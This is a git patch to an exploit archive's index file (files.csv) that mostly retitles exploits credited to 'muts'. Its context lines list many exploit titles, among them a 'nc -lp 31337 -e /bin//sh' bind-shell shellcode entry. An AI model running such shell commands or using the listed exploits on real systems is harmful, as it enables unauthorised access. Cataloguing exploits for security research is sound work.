From a6cc99bac3177da4a058fb5f1ba20cc98bb3d00e Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Wed, 5 Aug 2015 05:02:03 +0000
Subject: [PATCH] DB: 2015-08-05

---
 files.csv | 48 ++---
 platforms/windows/dos/5343.py | 150 +++++++-------
 platforms/windows/dos/5344.py | 42 ++--
 platforms/windows/dos/599.py | 6 +-
 platforms/windows/local/1985.py | 172 ++++++++--------
 platforms/windows/local/5462.py | 330 +++++++++++++++---------------
 platforms/windows/remote/1378.py | 272 ++++++++++++------------
 platforms/windows/remote/2258.py | 304 +++++++++++++--------------
 platforms/windows/remote/3616.py | 290 +++++++++++++-------------
 platforms/windows/remote/4027.py | 214 +++++++++----------
 platforms/windows/remote/4573.py | 200 +++++++++---------
 platforms/windows/remote/4657.py | 250 +++++++++++-----------
 platforms/windows/remote/4724.py | 178 ++++++++--------
 platforms/windows/remote/663.py | 6 +-
 platforms/windows/remote/7410.htm | 110 +++++-----
 platforms/windows/remote/9559.pl | 288 +++++++++++++-------------
 16 files changed, 1430 insertions(+), 1430 deletions(-)

diff --git a/files.csv b/files.csv
index 201d0103c..3152587a9 100755
--- a/files.csv
+++ b/files.csv
@@ -459,7 +459,7 @@ id,file,description,date,author,platform,type,port
 593,platforms/windows/dos/593.pl,"Quick 'n EasY 2.4 - Ftp Server Remote DoS",2004-10-24,KaGra,windows,dos,0
 594,platforms/windows/dos/594.pl,"BaSoMail Server 1.24 POP3/SMTP Remote Denial of Service Exploit",2004-10-24,KaGra,windows,dos,0
 598,platforms/windows/remote/598.py,"MailCarrier 2.51 - SMTP EHLO / HELO Buffer Overflow Exploit",2004-10-26,muts,windows,remote,25
-599,platforms/windows/dos/599.py,"BaSoMail Multiple Buffer Overflow Denial of Service Exploit",2004-10-26,muts,windows,dos,0
+599,platforms/windows/dos/599.py,"BaSoMail - Multiple Buffer Overflow Denial of Service Exploit",2004-10-26,muts,windows,dos,0
 600,platforms/linux/local/600.c,"GD Graphics Library Heap Overflow Proof of Concept Exploit",2004-10-26,N/A,linux,local,0
 601,platforms/linux/local/601.c,"libxml 2.6.12 nanoftp Remote Buffer Overflow Proof of Concept Exploit",2004-10-26,infamous41md,linux,local,0
 602,platforms/sco/local/602.c,"SCO Openserver 5.0.7 (MMDF deliver) Local Root Exploit",2004-10-26,"Ramon Valle",sco,local,0
@@ -510,7 +510,7 @@ id,file,description,date,author,platform,type,port
 659,platforms/cgi/webapps/659.txt,"EZshopper - Directory Transversal (loadpage.cgi)",2004-11-25,"Zero X",cgi,webapps,0
 660,platforms/linux/remote/660.c,"PHP <= 4.3.7/ 5.0.0RC3 memory_limit Remote Exploit",2004-11-27,"Gyan Chawdhary",linux,remote,80
 662,platforms/windows/dos/662.pl,"3Dmax 6.x backburner Manager <= 2.2 - Denial of Service Exploit",2004-11-28,Xtiger,windows,dos,0
-663,platforms/windows/remote/663.py,"Mercury Mail 4.01 (Pegasus) IMAP Buffer Overflow Exploit",2004-11-29,muts,windows,remote,143
+663,platforms/windows/remote/663.py,"Mercury Mail 4.01 - (Pegasus) IMAP Buffer Overflow Exploit",2004-11-29,muts,windows,remote,143
 664,platforms/windows/dos/664.c,"WS_FTP Server <= 5.03 MKD Remote Buffer Overflow Exploit",2004-11-29,NoPh0BiA,windows,dos,0
 665,platforms/windows/dos/665.c,"Orbz Game <= 2.10 - Remote Buffer Overflow Exploit",2004-11-29,"Luigi Auriemma",windows,dos,0
 667,platforms/windows/dos/667.c,"Jana Server <= 2.4.4 (http/pna) Denial of Service Exploit",2004-11-30,"Luigi Auriemma",windows,dos,0
@@ -1147,9 +1147,9 @@ id,file,description,date,author,platform,type,port
 1375,platforms/windows/remote/1375.pl,"Mercury Mail Transport System 4.01b Remote Exploit (PH SERVER)",2005-12-16,kingcope,windows,remote,105
 1376,platforms/windows/dos/1376.c,"Microsoft Windows IIS - Malformed HTTP Request Denial of Service Exploit (c)",2005-12-19,Kozan,windows,dos,0
 1377,platforms/windows/dos/1377.pl,"Microsoft Windows IIS - Malformed HTTP Request Denial of Service Exploit (pl)",2005-12-19,kokanin,windows,dos,0
-1378,platforms/windows/remote/1378.py,"MailEnable Enterprise Edition 1.1 (EXAMINE) Buffer Overflow Exploit",2005-12-19,muts,windows,remote,0
+1378,platforms/windows/remote/1378.py,"MailEnable Enterprise Edition 1.1 - (EXAMINE) Buffer Overflow Exploit",2005-12-19,muts,windows,remote,0
 1379,platforms/php/webapps/1379.php,"PHPGedView <= 3.3.7 - Arbitrary Remote Code Execution Exploit",2005-12-20,rgod,php,webapps,0
-1380,platforms/windows/remote/1380.py,"Eudora Qualcomm WorldMail 3.0 (IMAPd) Remote Overflow Exploit",2005-12-20,muts,windows,remote,143
+1380,platforms/windows/remote/1380.py,"Eudora Qualcomm WorldMail 3.0 - (IMAPd) Remote Overflow Exploit",2005-12-20,muts,windows,remote,143
 1381,platforms/windows/remote/1381.pm,"Golden FTP Server <= 1.92 - (APPE) Remote Overflow Exploit (meta)",2005-12-20,redsand,windows,remote,21
 1382,platforms/php/webapps/1382.pl,"phpBB <= 2.0.18 - Remote Bruteforce/Dictionary Attack Tool (updated)",2006-02-20,DarkFig,php,webapps,0
 1383,platforms/php/webapps/1383.txt,"phpBB <= 2.0.18 - Remote XSS Cookie Disclosure Exploit",2005-12-21,jet,php,webapps,0
@@ -1690,7 +1690,7 @@ id,file,description,date,author,platform,type,port
 1982,platforms/php/webapps/1982.txt,"WonderEdit Pro CMS (template_path) - Remote File Include Vulnerabilities",2006-07-04,OLiBekaS,php,webapps,0
 1983,platforms/php/webapps/1983.txt,"MyPHP CMS <= 0.3 (domain) Remote File Include Vulnerability",2006-07-05,Kw3[R]Ln,php,webapps,0
 1984,platforms/windows/dos/1984.py,"WinRAR <= 3.60 beta 6 (SFX Path) Stack Overflow Exploit PoC",2006-07-05,posidron,windows,dos,0
-1985,platforms/windows/local/1985.py,"WinRAR <= 3.60 beta 6 (SFX Path) Local Stack Overflow Exploit",2006-07-05,muts,windows,local,0
+1985,platforms/windows/local/1985.py,"WinRAR <= 3.60 beta 6 - (SFX Path) Local Stack Overflow Exploit",2006-07-05,muts,windows,local,0
 1986,platforms/windows/local/1986.cpp,"Microsoft Excel 2000/2003 Hlink Local Buffer Overflow Exploit (french)",2006-07-06,NSRocket,windows,local,0
 1987,platforms/asp/webapps/1987.txt,"Hosting Controller <= 6.1 Hotfix 3.1 Privilege Escalation Vulnerability",2006-07-06,"Soroush Dalili",asp,webapps,0
 1988,platforms/windows/local/1988.pl,"Microsoft Excel 2003 Hlink Local Buffer Overflow Exploit (italian)",2006-07-06,oveRet,windows,local,0
@@ -1951,7 +1951,7 @@ id,file,description,date,author,platform,type,port
 2255,platforms/php/webapps/2255.txt,"eFiction < 2.0.7 - Remote Admin Authentication Bypass Vulnerability",2006-08-25,Vipsta,php,webapps,0
 2256,platforms/php/webapps/2256.txt,"Integramod Portal <= 2.0 rc2 (phpbb_root_path) Remote File Include",2006-08-25,MATASANOS,php,webapps,0
 2257,platforms/php/webapps/2257.txt,"CliServ Web Community <= 0.65 (cl_headers) Include Vulnerability",2006-08-25,Kacper,php,webapps,0
-2258,platforms/windows/remote/2258.py,"MDaemon POP3 Server < 9.06 (USER) Remote Heap Overflow Exploit",2006-08-26,muts,windows,remote,110
+2258,platforms/windows/remote/2258.py,"MDaemon POP3 Server < 9.06 - (USER) Remote Heap Overflow Exploit",2006-08-26,muts,windows,remote,110
 2259,platforms/php/webapps/2259.txt,"proManager <= 0.73 (note.php) Remote SQL Injection Vulnerability",2006-08-26,Kacper,php,webapps,0
 2260,platforms/php/webapps/2260.pl,"AlberT-EasySite <= 1.0a5 (PSA_PATH) Remote File Include Exploit",2006-08-27,Kacper,php,webapps,0
 2261,platforms/php/webapps/2261.php,"iziContents <= RC6 GLOBALS[] Remote Code Execution Exploit",2006-08-27,Kacper,php,webapps,0
@@ -3274,7 +3274,7 @@ id,file,description,date,author,platform,type,port
 3613,platforms/php/webapps/3613.txt,"phpBB MOD Forum picture and META tags 1.7 RFI Vulnerability",2007-03-30,bd0rk,php,webapps,0
 3614,platforms/php/webapps/3614.txt,"JSBoard 2.0.10 (login.php table) Local File Inclusion Vulnerability",2007-03-30,GoLd_M,php,webapps,0
 3615,platforms/linux/remote/3615.c,"dproxy-nexgen Remote Root Buffer Overflow Exploit (x86-lnx)",2007-03-30,mu-b,linux,remote,53
-3616,platforms/windows/remote/3616.py,"IBM Lotus Domino Server 6.5 PRE AUTH Remote Exploit",2007-03-31,muts,windows,remote,143
+3616,platforms/windows/remote/3616.py,"IBM Lotus Domino Server 6.5 - PRE AUTH Remote Exploit",2007-03-31,muts,windows,remote,143
 3617,platforms/windows/local/3617.cpp,"Microsoft Windows - Animated Cursor (.ANI) Stack Overflow Exploit",2007-03-31,devcode,windows,local,0
 3618,platforms/php/webapps/3618.htm,"XOOPS Module Lykos Reviews 1.00 (index.php) SQL Injection Exploit",2007-03-31,ajann,php,webapps,0
 3619,platforms/php/webapps/3619.pl,"XOOPS Module Library (viewcat.php) Remote SQL Injection Exploit",2007-03-31,ajann,php,webapps,0
@@ -3677,7 +3677,7 @@ id,file,description,date,author,platform,type,port
 4024,platforms/windows/local/4024.rb,"DVD X Player 4.1 Professional .PLF file Buffer Overflow Exploit",2007-06-02,n00b,windows,local,0
 4025,platforms/php/webapps/4025.php,"Quick.Cart <= 2.2 RFI/LFI Remote Code Execution Exploit",2007-06-02,Kacper,php,webapps,0
 4026,platforms/php/webapps/4026.php,"PNphpBB2 <= 1.2 - (index.php c) Remote SQL Injection Exploit",2007-06-03,Kacper,php,webapps,0
-4027,platforms/windows/remote/4027.py,"IBM Tivoli Provisioning Manager PRE AUTH Remote Exploit",2007-06-03,muts,windows,remote,8080
+4027,platforms/windows/remote/4027.py,"IBM Tivoli Provisioning Manager - PRE AUTH Remote Exploit",2007-06-03,muts,windows,remote,8080
 4028,platforms/linux/local/4028.txt,"screen 4.0.3 - Local Authentication Bypass Vulnerability (OpenBSD)",2008-06-18,Rembrandt,linux,local,0
 4029,platforms/php/webapps/4029.php,"Sendcard <= 3.4.1 (Local File Inclusion) Remote Code Execution Exploit",2007-06-04,Silentz,php,webapps,0
 4030,platforms/php/webapps/4030.php,"EQdkp <= 1.3.2 (listmembers.php rank) Remote SQL Injection Exploit",2007-06-04,Silentz,php,webapps,0
@@ -4216,7 +4216,7 @@ id,file,description,date,author,platform,type,port
 4570,platforms/multiple/local/4570.pl,"Oracle 10g/11g SYS.LT.FINDRICSET Local SQL Injection Exploit",2007-10-27,bunker,multiple,local,0
 4571,platforms/multiple/local/4571.pl,"Oracle 10g/11g SYS.LT.FINDRICSET Local SQL Injection Exploit (2)",2007-10-27,bunker,multiple,local,0
 4572,platforms/multiple/local/4572.txt,"Oracle 10g LT.FINDRICSET Local SQL Injection Exploit (IDS evasion)",2007-10-27,sh2kerr,multiple,local,0
-4573,platforms/windows/remote/4573.py,"IBM Tivoli Storage Manager 5.3 Express CAD Service BoF Exploit",2007-10-27,muts,windows,remote,1581
+4573,platforms/windows/remote/4573.py,"IBM Tivoli Storage Manager 5.3 - Express CAD Service BoF Exploit",2007-10-27,muts,windows,remote,1581
 4574,platforms/windows/remote/4574.pl,"IBM Lotus Domino 7.0.2FP1 IMAP4 Server LSUB Command Exploit",2007-10-27,FistFuXXer,windows,remote,143
 4575,platforms/php/webapps/4575.txt,"GoSamba 1.0.1 (include_path) Multiple RFI Vulnerabilities",2007-10-27,GoLd_M,php,webapps,0
 4576,platforms/php/webapps/4576.txt,"JobSite Professional 2.0 file.php Remote SQL Injection Vulnerability",2007-10-28,ZynbER,php,webapps,0
@@ -4299,7 +4299,7 @@ id,file,description,date,author,platform,type,port
 4654,platforms/php/webapps/4654.txt,"PBLang <= 4.99.17.q Remote File Rewriting / Command Execution",2007-11-24,KiNgOfThEwOrLd,php,webapps,0
 4655,platforms/php/webapps/4655.txt,"project alumni <= 1.0.9 - Remote XSS / SQL Injection Vulnerability",2007-11-24,tomplixsee,php,webapps,0
 4656,platforms/php/webapps/4656.txt,"RunCMS <= 1.6 - Local File Inclusion Vulnerability",2007-11-24,BugReport.IR,php,webapps,0
-4657,platforms/windows/remote/4657.py,"Apple QuickTime 7.2/7.3 RTSP Response Universal Exploit (IE7/FF/Opera)",2007-11-26,muts,windows,remote,0
+4657,platforms/windows/remote/4657.py,"Apple QuickTime 7.2/7.3 - RTSP Response Universal Exploit (IE7/FF/Opera)",2007-11-26,muts,windows,remote,0
 4658,platforms/php/webapps/4658.php,"RunCMS <= 1.6 disclaimer.php Remote File Overwrite Exploit",2007-11-25,BugReport.IR,php,webapps,0
 4659,platforms/php/webapps/4659.txt,"IAPR COMMENCE 1.3 - Multiple Remote File Inclusion Vulnerability",2007-11-25,ShAy6oOoN,php,webapps,0
 4660,platforms/php/webapps/4660.pl,"Softbiz Freelancers Script 1 - Remote SQL Injection Exploit",2007-11-25,IRCRASH,php,webapps,0
@@ -4366,7 +4366,7 @@ id,file,description,date,author,platform,type,port
 4721,platforms/php/webapps/4721.txt,"Wordpress <= 2.3.1 - Charset Remote SQL Injection Vulnerability",2007-12-11,"Abel Cheung",php,webapps,0
 4722,platforms/php/webapps/4722.txt,"viart cms/shop/helpdesk 3.3.2 - Remote File Inclusion Vulnerability",2007-12-11,RoMaNcYxHaCkEr,php,webapps,0
 4723,platforms/osx/dos/4723.c,"Apple Mac OS X xnu <= 1228.0 - super_blob Local kernel Denial of Service PoC",2007-12-12,mu-b,osx,dos,0
-4724,platforms/windows/remote/4724.py,"HP OpenView Network Node Manager 07.50 CGI Remote BoF Exploit",2007-12-12,muts,windows,remote,80
+4724,platforms/windows/remote/4724.py,"HP OpenView Network Node Manager 07.50 - CGI Remote BoF Exploit",2007-12-12,muts,windows,remote,80
 4725,platforms/php/webapps/4725.txt,"Fastpublish CMS 1.9999 config[fsBase] RFI Vulnerability",2007-12-12,RoMaNcYxHaCkEr,php,webapps,0
 4726,platforms/php/webapps/4726.txt,"CityWriter 0.9.7 head.php Remote File Inclusion Vulnerability",2007-12-13,RoMaNcYxHaCkEr,php,webapps,0
 4727,platforms/php/webapps/4727.txt,"CMS Galaxie Software (category_id) Remote SQL Injection Vulnerability",2007-12-13,MurderSkillz,php,webapps,0
@@ -4974,8 +4974,8 @@ id,file,description,date,author,platform,type,port
 5340,platforms/php/webapps/5340.txt,"RunCMS Module bamagalerie3 - Remote SQL Injection Vulnerability",2008-04-01,DreamTurk,php,webapps,0
 5341,platforms/windows/dos/5341.pl,"Noticeware Email Server 4.6.1.0 - Denial of Service Exploit",2008-04-01,Ray,windows,dos,0
 5342,platforms/windows/remote/5342.py,"HP OpenView NNM 7.5.1 - OVAS.exe SEH PRE AUTH Overflow Exploit",2008-04-02,muts,windows,remote,7510
-5343,platforms/windows/dos/5343.py,"Mcafee EPO 4.0 FrameworkService.exe Remote Denial of Service Exploit",2008-04-02,muts,windows,dos,0
-5344,platforms/windows/dos/5344.py,"Novel eDirectory HTTP Denial of Service Exploit",2008-04-02,muts,windows,dos,0
+5343,platforms/windows/dos/5343.py,"Mcafee EPO 4.0 - FrameworkService.exe Remote Denial of Service Exploit",2008-04-02,muts,windows,dos,0
+5344,platforms/windows/dos/5344.py,"Novel eDirectory HTTP - Denial of Service Exploit",2008-04-02,muts,windows,dos,0
 5345,platforms/php/webapps/5345.txt,"Joomla Component OnlineFlashQuiz <= 1.0.2 RFI Vulnerability",2008-04-02,NoGe,php,webapps,0
 5346,platforms/windows/local/5346.pl,"XnView 1.92.1 Slideshow (FontName) Buffer Overflow Exploit",2008-04-02,haluznik,windows,local,0
 5347,platforms/php/webapps/5347.txt,"DaZPHP 0.1 (prefixdir) Local File Inclusion Vulnerability",2008-04-02,w0cker,php,webapps,0
@@ -5092,7 +5092,7 @@ id,file,description,date,author,platform,type,port
 5459,platforms/php/webapps/5459.txt,"e107 module 123 flash chat 6.8.0 - Remote File Inclusion Vulnerability",2008-04-17,by_casper41,php,webapps,0
 5460,platforms/windows/dos/5460.html,"Microsoft Works 7 WkImgSrv.dll ActiveX Denial of Service PoC",2008-04-17,"Shennan Wang",windows,dos,0
 5461,platforms/windows/remote/5461.rb,"Intel Centrino ipw2200BG Wireless Driver Remote BoF Exploit (meta)",2008-04-17,oveRet,windows,remote,0
-5462,platforms/windows/local/5462.py,"DivX Player 6.6.0 SRT File SEH Buffer Overflow Exploit",2008-04-18,muts,windows,local,0
+5462,platforms/windows/local/5462.py,"DivX Player 6.6.0 - .SRT File SEH Buffer Overflow Exploit",2008-04-18,muts,windows,local,0
 5463,platforms/php/webapps/5463.txt,"Grape Statistics 0.2a (location) Remote File Inclusion Vulnerability",2008-04-18,MajnOoNxHaCkEr,php,webapps,0
 5464,platforms/php/webapps/5464.txt,"5th Avenue Shopping Cart (category_ID) SQL Injection Vulnerability",2008-04-18,"Aria-Security Team",php,webapps,0
 5465,platforms/php/webapps/5465.txt,"2532/Gigs <= 1.2.2 - Arbitrary Database Backup/Download Vulnerability",2008-04-18,t0pP8uZz,php,webapps,0
@@ -6951,7 +6951,7 @@ id,file,description,date,author,platform,type,port
 7407,platforms/php/webapps/7407.txt,"Webmaster Marketplace (member.php u) SQL Injection Vulnerability",2008-12-10,"Hussin X",php,webapps,0
 7408,platforms/php/webapps/7408.txt,"living Local 1.1 (xss-rfu) Multiple Vulnerabilities",2008-12-10,Bgh7,php,webapps,0
 7409,platforms/php/webapps/7409.txt,"Pro Chat Rooms 3.0.2 (XSS/CSRF) Multiple Vulnerabilities",2008-12-10,ZynbER,php,webapps,0
-7410,platforms/windows/remote/7410.htm,"Microsoft Internet Explorer - XML Parsing Buffer Overflow Exploit (vista) (0day)",2008-12-10,muts,windows,remote,0
+7410,platforms/windows/remote/7410.htm,"Microsoft Internet Explorer - XML Parsing Buffer Overflow Exploit (Vista) (0day)",2008-12-10,muts,windows,remote,0
 7411,platforms/php/webapps/7411.txt,"Butterfly Organizer 2.0.1 (view.php id) SQL Injection Vulnerability",2008-12-10,Osirys,php,webapps,0
 7412,platforms/asp/webapps/7412.txt,"cf shopkart 5.2.2 (sql/dd) Multiple Vulnerabilities",2008-12-10,AlpHaNiX,asp,webapps,0
 7413,platforms/asp/webapps/7413.pl,"CF_Calendar (calendarevent.cfm) Remote SQL Injection Exploit",2008-12-10,AlpHaNiX,asp,webapps,0
@@ -9020,7 +9020,7 @@ id,file,description,date,author,platform,type,port
 9554,platforms/windows/dos/9554.html,"Apple iPhone 2.2.1/3.x (MobileSafari) Crash & Reboot Exploit",2009-08-31,TheLeader,windows,dos,0
 9555,platforms/php/webapps/9555.txt,"Mybuxscript PTC-BUX (spnews.php) SQL Injection Vulnerability",2009-08-31,HxH,php,webapps,0
 9556,platforms/php/webapps/9556.php,"osCommerce Online Merchant 2.2 RC2a Code Execution Exploit",2009-08-31,flyh4t,php,webapps,0
-9559,platforms/windows/remote/9559.pl,"Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit (win2k sp4)",2009-09-01,muts,windows,remote,21
+9559,platforms/windows/remote/9559.pl,"Microsoft IIS 5.0 - FTP Server Remote Stack Overflow Exploit (win2k sp4)",2009-09-01,muts,windows,remote,21
 9560,platforms/windows/local/9560.txt,"Soritong MP3 Player 1.0 - (.m3u/UI.txt) Universal Local BoF Exploits",2009-09-01,hack4love,windows,local,0
 9561,platforms/windows/dos/9561.py,"AIMP2 Audio Converter <= 2.53b330 - (.pls/.m3u) Unicode Crash PoC",2009-09-01,mr_me,windows,dos,0
 9562,platforms/asp/webapps/9562.txt,"JSFTemplating / Mojarra Scales / GlassFish - File Disclosure Vulnerabilities",2009-09-01,"SEC Consult",asp,webapps,0
@@ -12519,7 +12519,7 @@ id,file,description,date,author,platform,type,port
 14232,platforms/php/webapps/14232.txt,"Joomla JPodium Component (com_jpodium) SQL Injection Vulnerability",2010-07-05,RoAd_KiLlEr,php,webapps,0
 14233,platforms/php/webapps/14233.txt,"Bs Auction Script SQL Injection Vulnerability",2010-07-05,Sid3^effects,php,webapps,0
 14234,platforms/linux/shellcode/14234.c,"125 bind port to 6778 XOR encoded polymorphic linux shellcode .",2010-07-05,gunslinger_,linux,shellcode,0
-14236,platforms/windows/dos/14236.txt,"Sun Java Web Server 7.0 u7 Admin Interface DoS",2010-07-06,muts,windows,dos,8800
+14236,platforms/windows/dos/14236.txt,"Sun Java Web Server 7.0 u7 - Admin Interface DoS",2010-07-06,muts,windows,dos,8800
 14235,platforms/linux/shellcode/14235.c,"nc -lp 31337 -e /bin//sh polymorphic linux shellcode (91 bytes)",2010-07-05,gunslinger_,linux,shellcode,0
 14237,platforms/php/webapps/14237.txt,"IBM Bladecenter Management - Multiple Web application vulnerabilities",2010-07-06,"Alexey Sintsov",php,webapps,0
 14238,platforms/php/webapps/14238.txt,"BS Auction <= SQL Injection Vulnerability Exploit",2010-07-06,"Easy Laster",php,webapps,0
@@ -17259,7 +17259,7 @@ id,file,description,date,author,platform,type,port
 19899,platforms/cgi/dos/19899.txt,"UltraBoard 1.6 DoS Vulnerability",2000-05-05,"Juan M. Bello Rivas",cgi,dos,0
 19900,platforms/linux/local/19900.c,"RedHat Linux 6.0/6.1/6.2 pam_console Vulnerability",2000-05-03,"Michal Zalewski",linux,local,0
 19901,platforms/hardware/remote/19901.txt,"Netopia R-series routers 4.6.2 Vulnerability",2000-05-16,"Stephen Friedl",hardware,remote,0
-20010,platforms/php/webapps/20010.txt,"X-Cart Gold 4.5 (products_map.php symb parameter) XSS Vulnerability",2012-07-21,muts,php,webapps,0
+20010,platforms/php/webapps/20010.txt,"X-Cart Gold 4.5 - (products_map.php symb parameter) XSS Vulnerability",2012-07-21,muts,php,webapps,0
 19906,platforms/multiple/remote/19906.txt,"Matt Wright FormMail 1.6/1.7/1.8 Environmental Variables Disclosure Vulnerability",2000-05-10,"Black Watch Labs",multiple,remote,0
 19907,platforms/windows/dos/19907.txt,"Microsoft IIS 4.0/5.0 Malformed File Extension DoS Vulnerability",2000-05-11,"Ussr Labs",windows,dos,0
 19908,platforms/windows/remote/19908.txt,"Microsoft IIS 4.0/5.0 Malformed Filename Request Vulnerability",2000-05-11,"Cerberus Security Team",windows,remote,0
@@ -17379,17 +17379,17 @@ id,file,description,date,author,platform,type,port
 20030,platforms/unix/remote/20030.c,"wu-ftpd 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (1)",1999-10-15,tf8,unix,remote,0
 20031,platforms/linux/remote/20031.c,"wu-ftpd 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (2)",2000-09-26,vsz_,linux,remote,0
 20032,platforms/lin_x86/remote/20032.txt,"wu-ftpd 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (3)",2001-05-04,justme,lin_x86,remote,0
-20033,platforms/php/webapps/20033.py,"Dell SonicWALL Scrutinizer 9.0.1 (statusFilter.php q parameter) SQL Injection",2012-07-22,muts,php,webapps,0
+20033,platforms/php/webapps/20033.py,"Dell SonicWALL Scrutinizer 9.0.1 - (statusFilter.php q parameter) SQL Injection",2012-07-22,muts,php,webapps,0
 20035,platforms/asp/webapps/20035.js,"ipswitch whatsup gold 15.02 - Stored XSS - blind SQLi - rce",2012-07-22,muts,asp,webapps,0
 20036,platforms/windows/local/20036.pl,"Photodex ProShow Producer 5.0.3256 - Local Buffer Overflow Exploit",2012-07-23,mr.pr0n,windows,local,0
 20037,platforms/linux/webapps/20037.txt,"Atmail WebAdmin and Webmail Control Panel SQL Root Password Disclosure",2012-07-23,Ciph3r,linux,webapps,0
-20038,platforms/linux/webapps/20038.py,"Symantec Web Gateway 5.0.2 (blocked.php id parameter) Blind SQL Injection",2012-07-23,muts,linux,webapps,0
+20038,platforms/linux/webapps/20038.py,"Symantec Web Gateway 5.0.2 - (blocked.php id parameter) Blind SQL Injection",2012-07-23,muts,linux,webapps,0
 20039,platforms/windows/dos/20039.java,"LeafDigital LeafChat 1.7 DoS Vulnerability",2000-06-25,"MDMA Crew",windows,dos,0
 20040,platforms/windows/remote/20040.c,"SapporoWorks WinProxy 2.0/2.0.1 - Buffer Overflow Vulnerability",2000-06-27,UNYUN,windows,remote,0
 20041,platforms/cgi/remote/20041.txt,"Flowerfire Sawmill 5.0.21 File Access Vulnerability",2000-06-26,"Larry W. Cashdollar",cgi,remote,0
 20042,platforms/unix/local/20042.c,"Flowerfire Sawmill 5.0.21 Weak Password Encryption Vulnerability",2000-06-26,"Larry W. Cashdollar",unix,local,0
 20043,platforms/linux/remote/20043.c,"DALnet Bahamut IRCd 4.6.5 - _SUMMON_ Buffer Overflow Vulnerability",2000-06-29,"Matt Conover",linux,remote,0
-20044,platforms/php/webapps/20044.txt,"Symantec Web Gateway 5.0.3.18 Blind SQLi Backdoor via MySQL Triggers",2012-07-23,muts,php,webapps,0
+20044,platforms/php/webapps/20044.txt,"Symantec Web Gateway 5.0.3.18 - Blind SQLi Backdoor via MySQL Triggers",2012-07-23,muts,php,webapps,0
 20045,platforms/linux/local/20045.c,"X 11.0/3.3.3/3.3.4/3.3.5/3.3.6/4.0 libX11 _XAsyncReply() Stack Corruption",2000-06-19,"Chris Evans",linux,local,0
 20046,platforms/unix/remote/20046.txt,"Netscape Professional Services FTP Server (LDAP Aware) 1.3.6 FTP Server Vulnerability",2000-06-21,"Michael Zalewski",unix,remote,0
 20048,platforms/windows/remote/20048.txt,"Microsoft Windows 2000 - Remote CPU-overload Vulnerability",2000-06-30,"SecureXpert Labs",windows,remote,0
@@ -17406,7 +17406,7 @@ id,file,description,date,author,platform,type,port
 20059,platforms/cgi/remote/20059.txt,"CGI-World Poll It 2.0 Internal Variable Override Vulnerability",2000-07-04,"Adrian Daminato",cgi,remote,0
 20060,platforms/linux/remote/20060.c,"BitchX IRC Client 75p1/75p3/1.0 c16 - _/INVITE_ Format String Vulnerability",2000-07-05,RaiSe,linux,remote,0
 20061,platforms/linux/remote/20061.c,"Canna Canna 3.5 b2 - Remote Buffer Overflow Vulnerability",2000-07-02,UNYUN,linux,remote,0
-20062,platforms/php/webapps/20062.py,"AlienVault OSSIM 3.1 Reflected XSS and Blind SQL Injection",2012-07-23,muts,php,webapps,0
+20062,platforms/php/webapps/20062.py,"AlienVault OSSIM 3.1 - Reflected XSS and Blind SQL Injection",2012-07-23,muts,php,webapps,0
 20063,platforms/windows/webapps/20063.txt,"Spiceworks 5.3.75941 - Stored XSS and Post-Auth SQL Injection",2012-07-23,dookie,windows,webapps,0
 20064,platforms/linux/remote/20064.py,"Symantec Web Gateway 5.0.3.18 - LFI Remote ROOT RCE Exploit",2012-07-24,muts,linux,remote,0
 20065,platforms/windows/remote/20065.txt,"DrPhibez and Nitro187 Guild FTPD 0.9.7 File Existence Disclosure Vulnerability",2000-07-08,"Andrew Lewis",windows,remote,0
@@ -17431,7 +17431,7 @@ id,file,description,date,author,platform,type,port
 20085,platforms/cgi/remote/20085.txt,"Computer Software Manufaktur Alibaba 2.0 Piped Command Vulnerability",2000-07-18,Prizm,cgi,remote,0
 20086,platforms/windows/remote/20086.c,"OReilly Software WebSite Professional 2.3.18/2.4/2.4.9 - 'webfind.exe' Buffer Overflow",2000-06-01,"Robert Horton",windows,remote,0
 20087,platforms/php/webapps/20087.py,"Zabbix <= 2.0.1 - Session Extractor (0day)",2012-07-24,muts,php,webapps,0
-20088,platforms/linux/remote/20088.py,"Symantec Web Gateway 5.0.3.18 pbcontrol.php ROOT RCE Exploit",2012-07-24,muts,linux,remote,0
+20088,platforms/linux/remote/20088.py,"Symantec Web Gateway 5.0.3.18 - pbcontrol.php ROOT RCE Exploit",2012-07-24,muts,linux,remote,0
 20089,platforms/windows/remote/20089.txt,"Microsoft IIS 4.0/5.0 Source Fragment Disclosure Vulnerability",2000-07-17,"Zuo Lei",windows,remote,0
 20090,platforms/hardware/remote/20090.txt,"HP JetDirect J3111A Invalid FTP Command DoS Vulnerability",2000-07-19,"Peter Grundl",hardware,remote,0
 20091,platforms/multiple/remote/20091.txt,"Stalker Communigate Pro 3.2.4 - Arbitrary File Read Vulnerability",2000-04-03,S21Sec,multiple,remote,0
@@ -17696,7 +17696,7 @@ id,file,description,date,author,platform,type,port
 20365,platforms/php/webapps/20365.py,"Wordpress Plugin ThreeWP Email Reflector 1.13 - Stored XSS",2012-08-08,loneferret,php,webapps,0
 20366,platforms/windows/webapps/20366.py,"winwebmail server 3.8.1.6 - Stored XSS",2012-08-08,loneferret,windows,webapps,0
 20367,platforms/windows/webapps/20367.py,"xeams email server 4.4 build 5720 - Stored XSS",2012-08-08,loneferret,windows,webapps,0
-20368,platforms/windows/webapps/20368.py,"IBM Proventia Network Mail Security System 2.5 POST File Read",2012-08-08,muts,windows,webapps,0
+20368,platforms/windows/webapps/20368.py,"IBM Proventia Network Mail Security System 2.5 - POST File Read",2012-08-08,muts,windows,webapps,0
 20369,platforms/hardware/remote/20369.sh,"Cisco PIX Firewall 5.2 PASV Mode FTP Internal Address Disclosure Vulnerability",2000-10-03,"Fabio Pietrosanti",hardware,remote,0
 20370,platforms/cgi/remote/20370.txt,"Kootenay Web Inc whois 1.0 - Remote Command Execution Vulnerability",2000-10-29,"Mark Stratman",cgi,remote,0
 20371,platforms/windows/remote/20371.txt,"Microsoft Windows 95/WfW smbclient Directory Traversal Vulnerability",1995-10-30,"Dan Shearer",windows,remote,0
diff --git a/platforms/windows/dos/5343.py b/platforms/windows/dos/5343.py
index 1f17ce8c5..eb8fcc0aa 100755
--- a/platforms/windows/dos/5343.py
+++ b/platforms/windows/dos/5343.py
@@ -1,75 +1,75 @@
-#!/usr/bin/python
-# Mcafee EPO 4.0 (and others) FrameworkService.exe DOS
-# More than meets the eye
-# Discovered and coded by Mati Aharoni
-# muts..at..offensive-security.com
